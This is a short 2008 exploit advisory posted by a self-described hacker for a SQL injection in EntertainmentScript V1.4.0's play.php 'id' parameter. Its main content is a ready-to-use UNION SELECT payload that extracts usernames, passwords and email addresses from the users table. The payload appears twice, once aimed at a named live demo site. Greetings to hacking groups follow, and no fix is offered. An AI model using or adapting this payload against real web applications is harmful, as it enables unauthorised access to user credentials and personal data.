EntertainmentScript (play.php id) Remote SQL Injection Vulnerability
2008-05-19 00:00:00#########################################
# rEm0te SQL Injection Vulnerability
#
# EntertainmentScript V1.4.0 (( play.php id ))
#
#########################################
## Script : EntertainmentScript.com V1.4.0 name script on demo site is ( fastfreemedia )
## DeMo : http://demo.fastfreemedia.com/index.php
#########################################
## AuTh0r : Mr.SQL
## H0ME : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
#########################################
## D0rK :: :)) not found
###################################################################################
## (()) -(:: SQL ::)- (())
www.Site.com/
play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*
--------
## :: liVe DeMO ::
http://demo.fastfreemedia.com/play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*
###########################################################################
Gr33Tz :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: (( MuslimS HaCkErS ))
##########################################################################
-((:::: Geek Inj3cT0r ::::))-
#
Fixes
No fixesIn order to submit a new fix you need to be registered.